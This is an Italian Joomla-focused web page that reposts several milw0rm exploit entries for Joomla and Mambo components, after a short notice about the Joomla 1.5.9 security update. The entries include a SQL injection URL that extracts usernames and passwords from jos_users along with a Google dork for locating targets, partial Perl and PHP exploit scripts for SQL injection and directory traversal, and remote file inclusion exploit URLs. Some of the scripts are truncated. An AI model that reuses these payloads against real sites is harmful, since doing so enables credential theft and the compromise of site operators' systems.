Insecurity Focus Mambo/Joomla

Pubblicata Joomla! 1.5.9

Nuovo aggiornamento per Joomla, la versione 1.5.9 corregge alcuni bug tra cui due problemi di sicurezza ed ècaldamente consigliato a tutti di effettuare l'aggiornamento immediatamente.

Clicca qui per scaricare la versione ufficiale inglese da joomlacode.org

Joomla com_simple_review Sql injection

########################################
#[~] Author :  EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label Hippi Godlike Nitrous

#[!] Module_Name:  com_simple_review
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"com_simple_review"
########################################
www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+
                     UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--

 simple_review
 29/05/2006
 Rowan Youngson
 This component in released under the Mozilla Public License Version 1.1
 www.row1.info
 1.3.5
 Simple Review is a Review component for the Mambo CMS

# milw0rm.com [2009-01-05]

Joomla com_phocadocumentation Sql injection

system("color FF0000");
system("Nohacking");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t| Turkish Securtiy Team |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Module com_phocadocumentation(section&id=)Remote SQL Injection Vuln|\n\n";
print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\n";
print "\t\t-------------------------------------------------------------\n\n";

use LWP::UserAgent;

print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
chomp(my $target=);

$column_name="concat(username,0x3a,password)";
$table_name="jos_users";

Joomla (xstandard editor) Local Directory Traversal Vulnerability

echo "* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vuln\n";
echo "* discovered by: irk4z[at]yahoo.pl\n";
echo "*\n";
echo "* greets: all friends ;) enjoy!\n";
echo "*------------------------------------------------------------------*\n";

$host = $argv[1];
$path = $argv[2];
$folder = $argv[3];

if (empty($host) || empty($path)) {
	echo "usage: php {$argv[0]}   []\n";
	echo "       php {$argv[0]} example.org /joomla\n";
	echo "       php {$argv[0]} example.org /joomla ../../\n";
	exit;
}

echo "http://" . $host . $path . "/images/stories/\n\n";

if ( empty($folder) ){
	$lev = "./";
	for( $i = 0; $i <= 7; $i++ ) {
		echo browseFolder($host, $path, $lev);
		$lev .= "../";
	}
} else {
	echo browseFolder($host, $path, $folder);
}
Â

Heatmap stats for Joomla! 1.0.1 Multiple Remote File Inclusion Vulnerabilities

 Software : com_clickheat version 1.0.1
       Vendor   : http://www.recly.com/
       Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com

VirtueMart Google Base Component 1.1 Remote File Inclusion Vulnerabilit

 Software : com_googlebase version 1.1
       Vendor   : www.e-commerce-solution.co.uk
       Download : http://www.joomlahacks.com/   [free download]
       Author   : cr4wl3r
       Contact  : cr4wl3r[4t]linuxmail[dot]org]
       Blog     : http://defacer.biz


=============================================================


  [o] Vulnerable file

       administrator/components/com_googlebase/admin.googlebase.php

 include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' );



  [o] Exploit

       http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?
mosConfig_absolute_path=[evilcode]


===============================================================


  [o] Greetz

       No Greetz        
===========================================================

# milw0rm.com [2008-11-04]

Revhost

Insecurity Focus Mambo/Joomla

Pubblicata Joomla! 1.5.9

Joomla com_simple_review Sql injection

Joomla com_phocadocumentation Sql injection

Joomla (xstandard editor) Local Directory Traversal Vulnerability

Heatmap stats for Joomla! 1.0.1 Multiple Remote File Inclusion Vulnerabilities

VirtueMart Google Base Component 1.1 Remote File Inclusion Vulnerabilit

Main Menu

Supporto Tecnico

Security Focus Mambo/Joomla

Offerte